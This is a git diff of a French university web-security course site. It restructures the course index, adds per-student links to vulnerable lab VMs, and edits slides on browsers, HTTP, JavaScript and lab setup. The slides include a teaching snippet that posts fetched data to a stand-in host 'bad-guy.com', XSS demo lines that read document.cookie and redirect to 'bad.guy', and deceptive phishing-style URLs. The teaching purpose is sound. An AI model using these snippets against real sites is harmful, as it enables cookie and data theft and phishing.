WIP

content/Etudiants/zz2-f5-websec.md

@@ -5,33 +5,176 @@ Tags: cours
 
 [TOC]
 
+<div class="panel panel-success">
+  <div class="panel-heading">
+    <h3 class="panel-title">😎 Personnaliser les slides</h3>
+  </div>
+  <div class="panel-body">
+    en entrant votre nom d'utilisateur uca ici 
+    <input type="text" placeholder="username" name="username" id="username" />, 
+    tous les références à la VM perso (la vulnérable) dans les slides ci-après, seront <strong>personnalisées avec le fqdn de votre VM</strong>, vous permettant d'appliquer les attaques directement depuis les slides
+  </div>
+</div>
+
 ## Contexte
 
-* [lab](slides/1337/lab.html)
-* [Souveraineté](slides/privacy/sovereignty.html)
-* [Mots de passes](slides/privacy/passwords.html)
-* [HTTP](slides/1337/http.html)
-* [HTTPS](slides/privacy/tls.html#/0/52)
-  * [Heartbleed](slides/1337/heartbleed.html)
-* [Browser](slides/1337/browser.html)
-* [JS](slides/1337/js.html)
-* [tracking](slides/privacy/tracking.html)
+<ul>
+  <li>
+    <a href="slides/1337/lab.html" 
+      class="customizable">
+      Lab
+    </a>
+  </li>
+  <li>
+    <a href="slides/privacy/sovereignty.html" 
+      class="customizable">
+      Souveraineté
+    </a>
+  </li>
+  <li>
+    <a href="slides/privacy/passwords.html"
+      class="customizable">
+      Mots de passes
+    </a>
+  </li>
+  <li>
+    <a href="slides/1337/http.html"
+      class="customizable">
+      HTTP
+    </a>
+  </li>
+  <li>
+    <a href="slides/privacy/tls.html#/0/52"
+      class="customizable">
+      HTTPS
+    </a>
+    <ul>
+      <li>
+        <a href="slides/1337/heartbleed.html"
+          class="customizable">
+          Heartbleed <i class="fas fa-tools"></i>
+        </a>
+      </li>
+    </ul>
+  </li>
+  <li>
+    <a href="slides/1337/browser.html"
+      class="customizable">
+      Browsers <i class="fas fa-hammer"></i>
+    </a>
+  </li>
+  <li>
+    <a href="slides/1337/js.html"
+      class="customizable">
+      Javascript <i class="fas fa-hammer"></i>
+    </a>
+  </li>
+  <li>
+    <a href="slides/privacy/tracking.html"
+      class="customizable">
+      Tracking
+    </a>
+  </li>
+</ul>
 
 ## Vulnérabilités communes
 
-* [Authentification](slides/1337/authentication.html)
-* [Command execution](slides/1337/cmdi.html)
-* [LFI_RFI](slides/1337/fi.html)
-* [Upload](slides/1337/upload.html)
-* [XSS](slides/1337/xss.html)
-* [CSRF](slides/1337/csrf.html)
-* [SQLi](slides/1337/sqli.html)
-    * [Drupalgeddon](slides/1337/drupalgeddon.html)
-* [captcha](slides/1337/captcha.html)
-
-<hr />
-
-<!-- *  [Shellshock](slides/1337/shellshock.html)
+<ul>
+  <li>
+    <a href="slides/1337/authentication.html"
+      class="customizable">
+        Authentification
+    </a>
+    <ul>
+      <li>
+        <a href="slides/1337/bruteforce.html"
+          class="customizable">
+          Brute force <i class="fas fa-hammer"></i>
+        </a>
+      </li>
+      <li>
+        <a href="slides/1337/session.html"
+          class="customizable">
+          Session <i class="fas fa-hammer"></i>
+        </a>
+      </li>
+    </ul>
+  </li>
+  <li>
+    <a href="slides/1337/cmdi.html"
+      class="customizable">
+      Command injection
+    </a>
+    <ul>
+      <li>
+        <a href="slides/1337/shellshock.html"
+          class="customizable">
+          Shellshock <i class="fas fa-tools"></i>
+        </a>
+      </li>
+    </ul>
+  </li>
+  <li>
+    <a href="slides/1337/fi.html"
+      class="customizable">
+        LFI_RFI
+    </a>
+  </li>
+  <li>
+    <a href="slides/1337/upload.html"
+      class="customizable">
+      Upload
+    </a>
+  </li>
+  <li>
+    <a href="slides/1337/xss.html"
+      class="customizable">
+      XSS
+    </a>
+    <ul>
+      <li>
+        <a href="(slides/1337/csp.html"
+          class="customizable">
+          CSP <i class="fas fa-hammer"></i>
+        </a>  
+      </li>
+      <li>
+        <a href="(slides/1337/sop.html"
+          class="customizable">
+          SOP/CORS <i class="fas fa-hammer"></i>
+        </a>  
+      </li>
+    </ul>
+  </li>
+  <li>
+    <a href="slides/1337/csrf.html"
+      class="customizable">
+      CSRF
+    </a>
+    <ul>
+      <li>
+        <a href="slides/1337/captcha.html"
+          class="customizable">
+          Recaptcha <i class="fas fa-hammer"></i>
+        </a>
+      </li>
+    </ul>
+  </li>
+  <li>
+    <a href="slides/1337/sqli.html"
+      class="customizable">
+      SQLi
+    </a>
+    <ul>
+      <li>
+        <a href="slides/1337/drupalgeddon.html"
+          class="customizable">
+          Drupalgeddon <i class="fas fa-tools"></i>
+        </a>
+      </li>
+    </ul>
+  </li>
+</ul>
 
 ## Pentesting
 
@@ -41,7 +184,9 @@ Tags: cours
 ## Se protéger
 
 * [Top10](slides/1337/top10.html)
-  * [anticiper](slides/1337/anticiper.html) -->
+* [anticiper](slides/1337/anticiper.html)
+
+<hr />
 
 <div class="panel panel-success">
   <div class="panel-heading">

content/extra/custom.js

@@ -18,6 +18,11 @@ $( document ).ready(function() {
         //event.preventDefault();
     });
 
+    $('a.customizable').click(function() {
+        if($('#username').val() != "") {
+            $(this).attr("href", $(this).attr("href") + "?" + $('#username').val());
+        }
+    });
 
     $('a.toggle').click(function() {
         

content/slides/1337/browser.html

+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>Browser</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/browser.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+    <script src="../main.js"></script>
+  </body>
+</html>

content/slides/1337/http.html

@@ -7,11 +7,11 @@
     <title>HTTP</title>
 
     <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
-    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
 
     <!-- Theme used for syntax highlighting of code -->
     <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
-    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
     <link rel="stylesheet" href="../main.css">
 
     <!-- Printing and PDF exports -->
@@ -35,7 +35,7 @@
       </div>
     </div>
 
-    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
     <script src="../../node_modules/reveal.js/js/reveal.js"></script>
 
     <script>

content/slides/1337/lab.html

@@ -66,5 +66,6 @@
         ]
       });
     </script>
+    <script src="../main.js"></script>
   </body>
 </html>

content/slides/1337/md/browser.md

+## Browsers
+
+![Browsers](images/browsers/main-desktop-browser-logos.png "Browsers")
+
+
+## Stats 06/2011
+
+[![Stats 06/2011](images/browsers/stats-browser-06-2011.jpg "Stats 06/2011")](https://code.adonline.id.au/my-web-stats-browser-operating-system-usage/)
+
+
+## Stats 11/2020
+
+[![Stats 11/2020](images/browsers/stats-browser-11-2020.png "Stats 11/2020")](https://en.wikipedia.org/wiki/Usage_share_of_web_browsers)
+
+
+## Browser
+
+<quote>
+Un navigateur web est un logiciel conçu pour consulter et afficher le World Wide Web. Techniquement, c'est au minimum un client HTTP.
+</quote>
+
+* [Navigateur web](https://fr.wikipedia.org/wiki/Navigateur_web)
+* [moz://a > L’histoire des navigateurs web](https://www.mozilla.org/fr/firefox/browsers/browser-history/)
+
+Dans la plupart des cas un navigateur embarque un interpréteur [javascript](js.html): ce qui induit quelque garde fous ...
+
 
 ## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
 
@@ -63,7 +89,9 @@ $(function() { // on Load jQuery style
   $.ajax({
     url: "https://gmail.com"
   }).done(function(sensitiveData) {
-    $.post("http://bad-guy.com/data.php", { sensitive_data: sensitiveData });
+    $.post("http://bad-guy.com/data.php", {
+      sensitive_data: sensitiveData 
+    });
   });
 });
 ```
@@ -103,7 +131,7 @@ Access-Control-Allow-Origin: *
 * autorise tous les verbes HTTP
   * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la méthode GET
 
-  * [<i class="fa fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy)
+  * [<i class="fab fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy)
 
 Note:
 - l'introduction de cette nouvelle possibilité implique nécessairement que les serveurs doivent gérer de nouvelles entêtes, et doivent renvoyer les ressources avec de nouvelles entêtes également

content/slides/1337/md/http.md

@@ -35,7 +35,7 @@ Note:
 - URL emplacement à suivre ne gère pas le déplacement de la ressource
 
 
-## URI/URL/URN
+## <i class="fa-solid fa-link"></i> URI/URL/URN
 
 ![URI/URL/URN](images/http/uri-url-urn.png "URI/URL/URN")<!-- .element syle="float: right"style="width: 30%" -->
 
@@ -52,19 +52,21 @@ Note:
   - ne gère pas le déplacement de la ressource
 
 
-## Schéma d'url
+## <i class="fa-solid fa-link"></i> Schéma d'url
 
 ![schéma d'url](images/http/urls.png "schéma d'url")<!-- .element style="width: 100%" -->
 
 les mots de passes peuvent transiter en claire via les schemas d'url
 
 
-## urls trompeuses
+## <i class="fa-solid fa-link-slash"></i> urls trompeuses
 
-* http://www.visa.com:1337@33.32.323.22:8080/cart?add=1345
-* http://visa.com:UserSession=56858&useroption=879@42.216.64.464
-* http://www.visa.com@33.32.323.22
-* https://www.v-i-s-a.com
+* <small>http://www.visa.com:1337@33.32.323.22:8080/cart?add=1345</small>
+* <small>http://visa.com:UserSession=56858&useroption=879@42.216.64.464</small>
+* <small>http://www.visa.com@33.32.323.22</small>
+* <small>https://www.v-i-s-a.com</small>
+
+<!-- https://airfrance%2Efr@myshort.ru/UWoezfMj/?airfrance-billets-gratuits.html -->
 
 
 ## requête HTTP
@@ -346,6 +348,7 @@ Cookie: PHPSESSID=hr0ms75gs6f7vlph0hhct2bjj3
   * 5MB / domaine contre 4096bytes pour le cookie
   * supprimable uniquement via js
 
+
 ## header, cookie, body, query string, script ...
 
 ![alt text](images/http/illuminati.jpg "Don't trust anyone")<!-- .element: width="35%" -->

content/slides/1337/md/js.md

@@ -94,18 +94,24 @@ Note:
 
 ```js
 window.alert('PoC')
+// affiche PoC en pop up
 ```
 
 ```js
-console.log('plus silencieux car visible avec la console only')
+console.log('plus silencieux')
+// affiche "plus silencieux"
+// dans la console (F12)
 ```
 
 ```js
-alert(document.cookie); // affiche le contenu du cookie de session en pop up
+alert(document.cookie); 
+// affiche le contenu du 
+// cookie de session en pop up
 ```
 
 ```js
-window.location = "http://bad.guy"; // redirige vers http://bad.guy
+window.location = "http://bad.guy"; 
+// redirige vers http://bad.guy
 ```
 
 Note:

content/slides/1337/md/lab.md

@@ -5,23 +5,24 @@
 ### h4PpY H4Ck1nG
 
 
-## pitch
+## <i class="fa-solid fa-poo-storm"></i> pitch
 
-* [https://vm-etu-vimazeno.local.isima.fr](https://vm-etu-vimazeno.local.isima.fr) 
-    * le vulnérable
+* [http://vm-etu-vimazeno.local.isima.fr](http://vm-etu-vimazeno.local.isima.fr) 
+    * la vulnérable
 * [https://perso.limos.fr/mazenod/slides/1337/exploits](https://perso.limos.fr/mazenod/slides/1337/exploits) 
-    * le malicieux
+    * la malicieuse
 * [kali](https://www.kali.org/) 
-    * la vm attaquante
+    * l'attaquante
+
 
 ## VirtualBox
 
-![VirtualBox](images/lab/virtualbox.png)
+[![VirtualBox](images/lab/virtualbox.png)](https://www.virtualbox.org/)
 
 
 ## Kali
 
-![Kali](images/lab/kali.svg)<!-- .element style="width: 50%" -->
+[![Kali](images/lab/kali.svg)<!-- .element style="width: 50%" -->](https://www.kali.org/)
 
 * [<i class="fa-solid fa-download"></i> get kali](https://www.kali.org/get-kali)
 * [<i class="fa fa-video-camera"></i> tongues of kali](https://www.youtube.com/watch?v=dH9wCRQFVR0) <- rien à voir ;)
@@ -40,6 +41,13 @@
     * kali:kali
 
 
+## Vim
+
+![vim](images/lab/vim.png)<!-- .element style="width: 40%" -->
+
+#### [<i class="fa-solid fa-gift"></i> survival cheatsheet](https://ryanstutorials.net/linuxtutorial/cheatsheetvi.php)
+
+
 ## Definitive Keyboard Mapping
 
 ![Definitve French keyboard](images/lab/keyboard.png)
@@ -59,13 +67,6 @@
 * see although `/etc/group`
 
 
-## Vim
-
-![vim](images/lab/vim.png)<!-- .element style="width: 40%" -->
-
-#### [<i class="fa-solid fa-gift"></i> survival cheatsheet](https://ryanstutorials.net/linuxtutorial/cheatsheetvi.php)
-
-
 ## burp suite
 
 * next / next / accept / ...
@@ -106,12 +107,19 @@ install [Proxy Switcher and Manager](https://addons.mozilla.org/fr/firefox/addon
 ![ff proxy settings / step 6](images/lab/ff-proxy-step-6.png)
 
 
-## Web developper addons
+## Web developer addons
+
+install [Web developer](https://chrispederick.com/work/web-developer/)
+
+![ff web developer](images/lab/ff-web-developer.png)
+
+
+## PHP
 
-https://chrispederick.com/work/web-developer/
 
 ## DVWA
 
+* [https://github.com/digininja/DVWA](https://github.com/digininja/DVWA)
 * htaccess to protect vm
 * security cookie
     * stocké dans la session
@@ -124,3 +132,8 @@ https://chrispederick.com/work/web-developer/
 * https://www.osboxes.org/debian
 * username:password
     * osboxes:osboxes.org
+
+
+# <i class="fa-solid fa-thumbs-up"></i> 
+
+[@sh4rpf0rc3](https://sharpforce.gitbook.io/cybersecurity/mon-blog/a-propos-de-moi)
\ No newline at end of file

content/slides/main.js

@@ -37,7 +37,8 @@ Reveal.addEventListener( "ready", (event) => {
                 url.origin == "http://vm-etu-vimazeno.local.isima.fr"
                 && user != ""
             ) {
-                a.href = "http://vm-" + user + ".local.isima.fr" + url.pathname + url.search;
+                a.href = "http://vm-etu-" + user + ".local.isima.fr" + url.pathname + url.search;
+                a.innerHTML = "http://vm-etu-" + user + ".local.isima.fr" + url.pathname + url.search;
                 a.target = "_blank";
             }
         }